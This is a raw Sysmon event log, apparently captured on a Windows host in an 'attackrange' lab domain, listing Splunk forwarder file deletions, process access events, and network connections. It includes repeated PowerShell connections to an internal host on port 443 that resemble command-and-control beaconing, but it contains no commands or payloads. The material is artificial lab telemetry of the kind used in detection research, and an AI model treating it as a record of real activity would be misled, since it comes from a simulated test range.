Rec=36497854; EventID=1 ProcessCreate; UtcTime=2021-09-14 13:19:39.295; ProcessGuid={B81B27B7-A16B-6140-9356-04000000C801}; ProcessId=2816; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe; FileVersion=8.0.2; Description=Windows Print Monitor; Product=splunk Application; Company=Splunk Inc.; OriginalFileName=splunk-winprintmon.exe; CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"; CurrentDirectory=C:\Windows\system32\; User=NT AUTHORITY\SYSTEM; LogonGuid={B81B27B7-4012-611D-E703-000000000000}; LogonId=0x3e7; TerminalSessionId=0; IntegrityLevel=System; Hashes=MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748; ParentProcessGuid={B81B27B7-4013-611D-2700-00000000C801}; ParentProcessId=2076; ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
Rec=36497853; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:39.194; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=2E0CC567556DAC45C8E7A0C69E166025,SHA256=E9F7D9DFEB46E965266AEB20ACE2786DE5C9E74CE7B5387D0817E8CD69B3D6CC,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497866; EventID=3 NetworkConnect; UtcTime=2021-09-14 13:20:10.461; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801}; ProcessId=6940; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; User=ATTACKRANGE\REED_SCHMIDT; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50588; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.16; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal; DestinationPort=443; DestinationPortName=https
Rec=36497865; EventID=3 NetworkConnect; UtcTime=2021-09-14 13:20:09.915; ProcessGuid={B81B27B7-401D-611D-6900-00000000C801}; ProcessId=3616; Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe; User=NT AUTHORITY\SYSTEM; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50587; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.12; DestinationHostname=-; DestinationPort=8000; DestinationPortName=-
Rec=36497864; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:40.331; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security; Hashes=MD5=30839BB7FE946A943CB4344C61DCD932,SHA256=A4D5012C2A9ADDA88BA56C70ADECD614809D1CC67FA387838BE1D2C337506FBA,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497863; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:40.215; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=3EF33376760E25B7606A87BFEAE2823C,SHA256=51825BC68A0578726701D7A954B15E73BD47DC82DF34F15996FB4135D881C396,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497867; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:41.245; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=44C4AFFACCFFF34D1F2979BE2CCAF735,SHA256=C4651459EA29B515CD81C0429D2B0A01D08BBF034411E07200C3F2878167125A,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497868; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:42.260; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=44646FDBCD3B74C220777CFFB0258867,SHA256=ED8984E13FD81C33D5E72EBBFE16F4E0FAD2CE9BD5C907843AF0D1F2F5EBD961,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497869; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:43.290; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=FF87A9128BBBA6E552D3EC2A270CF05A,SHA256=A6D89379F661747D20A2B6887046DE906B13D4CD8B5912E1343E976495E39B7B,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497873; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:44.807; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational; Hashes=MD5=CCDC73E649D6D0516D28A748F36F785F,SHA256=FB7F89F9A369D6807DDA67EAF43AA49E12C42ADC8A809EBC5C5B13A8A8CC56E9,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497872; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:44.342; ProcessGuid={B81B27B7-5BF5-611D-6D04-00000000C801}; ProcessId=5004; User=ATTACKRANGE\REED_SCHMIDT; Image=C:\Program Files\Mozilla Firefox\firefox.exe; TargetFilename=C:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm; Hashes=MD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497871; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:44.342; ProcessGuid={B81B27B7-5BF5-611D-6D04-00000000C801}; ProcessId=5004; User=ATTACKRANGE\REED_SCHMIDT; Image=C:\Program Files\Mozilla Firefox\firefox.exe; TargetFilename=C:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm; Hashes=MD5=734E88FA48CCB4109FE88EA78FA4D808,SHA256=36A5CF0C8EBDD8A53534C59B0C9A8B937985E3D23FC159FCEFD4528CAADD556C,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497870; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:44.307; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=549F6695589234473AE4C4620E575C4A,SHA256=F5B838BB9CA265D6AC319EF86E6BA2D2E06AEC4E3DDA0A5C058B10B72A2E0EE9,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497874; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:45.340; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=5E6F86946AD7D918E00FBD43CF636477,SHA256=E9CD67D9CFF277E2664D1BE298AB9A98ADB935D54C53EF37AA96DC7350271D39,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497876; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:46.371; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=C5958128997E748D00DE106F968DD516,SHA256=86DEB74725B9F235EACF47ED738C85BB58AF8155868F31BF3D4CA1A957997B11,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497875; EventID=3 NetworkConnect; UtcTime=2021-09-14 13:20:15.475; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801}; ProcessId=6940; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; User=ATTACKRANGE\REED_SCHMIDT; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50589; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.16; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal; DestinationPort=443; DestinationPortName=https
Rec=36497878; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:47.403; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=C60AE0B6A16E8E9D58E385EE5284F6BE,SHA256=2A939196DE9D954B2D9129A61F89D53D76C16B2CAE02D39BD27C13FF181E8027,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497877; EventID=3 NetworkConnect; UtcTime=2021-09-14 13:20:15.927; ProcessGuid={B81B27B7-401D-611D-6900-00000000C801}; ProcessId=3616; Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe; User=NT AUTHORITY\SYSTEM; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50590; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.12; DestinationHostname=-; DestinationPort=8000; DestinationPortName=-
Rec=36497879; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:48.421; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=4C8A82C4212798AA8F9CD8E868D045C2,SHA256=580AD84B088F686C65A1B01008D2FA652123CBCB6045D76518FA39ED73777605,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497881; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:49.820; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational; Hashes=MD5=A4EDCF0A5E52BEB17F18E66976873F35,SHA256=4DC5E90DEAA0D6E63D0682E9837F4FD94B759C1413482C1D4C36164B2BA4AD31,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497880; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:49.436; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=DE9D859AE2CEA81674047957386627FD,SHA256=12EC4D85B5CDF51BD8B5A03C45D6505794BCE30B1448A123027F2A35B4C6625F,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497883; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:50.466; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=160422B570212DC951154804AEF407FF,SHA256=4A5F3D7CCA3C1A08BE157C8B6106D3D670D5C40D99EF390AA3961B288032B2F8,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497882; EventID=3 NetworkConnect; UtcTime=2021-09-14 13:20:20.485; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801}; ProcessId=6940; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; User=ATTACKRANGE\REED_SCHMIDT; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50591; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.16; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal; DestinationPort=443; DestinationPortName=https
Rec=36497884; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:51.480; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=78DFF28931A6C28F6BC687F5182C09F3,SHA256=08C0C2C9BA8AE1202F5D7112AB858EAC9285664472787C4B5021446C37C34C4D,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497886; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:52.497; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=A545DC176C04779AF21767E6F637DE2D,SHA256=37BE3A2B1F673DA8FBD2A11EDE35A847A6C2426F49DE5CBFBB7D5D06424488D4,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497885; EventID=3 NetworkConnect; UtcTime=2021-09-14 13:20:21.905; ProcessGuid={B81B27B7-401D-611D-6900-00000000C801}; ProcessId=3616; Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe; User=NT AUTHORITY\SYSTEM; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50592; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.12; DestinationHostname=-; DestinationPort=8000; DestinationPortName=-
Rec=36497887; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:53.499; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=B26D7CEDDF41CC1F1CB37228682C299B,SHA256=6EA309C63CFE3814464CCFD7CEB5E8E58C23E227800FC2B99216C55ADEECC7FC,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497888; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:54.545; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=2AB461434D582237D76C8CB2156537FA,SHA256=DA500C6D7AFEB22C76E978E66D50948EDFEAF6EE45932DAA00BA015AC1C17D96,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497890; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:55.927; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational; Hashes=MD5=8F1FB5324D13E6F63461C33F621402EC,SHA256=87EDEA4B8981B9151FADFC1E712A0FA092231928BC2564712EBE441DFAAC7DD0,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497889; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:55.559; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=D8555C6EFBCC91ECC6C45DCC8D31A382,SHA256=C4886A3741FA4349C9A056CE1C3583A4A4D947342DAE8E3832E2BD65603B1C83,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497893; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:56.574; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=F39168CEB682889948DE87218B720279,SHA256=5F1385F27A6A0C1994EE4BF9ABCC86EB5BA5262DC597A90C6A2E10358F803B88,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497892; EventID=3 NetworkConnect; UtcTime=2021-09-14 13:20:26.499; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801}; ProcessId=6940; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; User=ATTACKRANGE\REED_SCHMIDT; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50593; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.16; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal; DestinationPort=443; DestinationPortName=https
Rec=36497891; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:56.294; ProcessGuid={B81B27B7-2BC4-612D-7CF4-01000000C801}; ProcessId=4056; User=ATTACKRANGE\REED_SCHMIDT; Image=C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe; TargetFilename=C:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a351177.TMP; Hashes=MD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497894; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:57.590; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=089ED9A9E693A33428CC42F053084A06,SHA256=C23427AC84B9E318362317BA2FD1CF6D6D037827AC0C28CC428C8BA76769158A,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497896; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:58.609; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=2AE9148B9526D09A3F9FE2DCEA4239F4,SHA256=B9FA410794D1A4F8DB3878F535BF80E69190F1A3C78D79DFEB4CB6EF6FFCFC8E,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497895; EventID=3 NetworkConnect; UtcTime=2021-09-14 13:20:27.928; ProcessGuid={B81B27B7-401D-611D-6900-00000000C801}; ProcessId=3616; Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe; User=NT AUTHORITY\SYSTEM; Protocol=tcp; Initiated=true; SourceIsIpv6=false; SourceIp=10.0.1.15; SourceHostname=win-host-987.attackrange.local; SourcePort=50594; SourcePortName=-; DestinationIsIpv6=false; DestinationIp=10.0.1.12; DestinationHostname=-; DestinationPort=8000; DestinationPortName=-
Rec=36497929; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:59.655; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=21C6021DED69E3A20CD1A52A4CEBFC55,SHA256=095E62A1D517C27CB7E3223D42915C64E827E8449828B88E6B829DD90D902651,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497928; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.589; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-1F2E-6131-9C70-02000000C801}; TargetProcessId=6620; TargetImage=C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497927; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.589; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-1F2E-6131-9C70-02000000C801}; TargetProcessId=6620; TargetImage=C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497926; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.589; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4133-611D-AB00-00000000C801}; TargetProcessId=4564; TargetImage=C:\Windows\Explorer.EXE; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497925; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.589; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4133-611D-AB00-00000000C801}; TargetProcessId=4564; TargetImage=C:\Windows\Explorer.EXE; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497924; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:59.589; SourceProcessGUID={B81B27B7-4012-611D-0D00-00000000C801}; SourceProcessId=792; SourceThreadId=812; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4133-611D-AB00-00000000C801}; TargetProcessId=4564; TargetImage=C:\Windows\Explorer.EXE; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
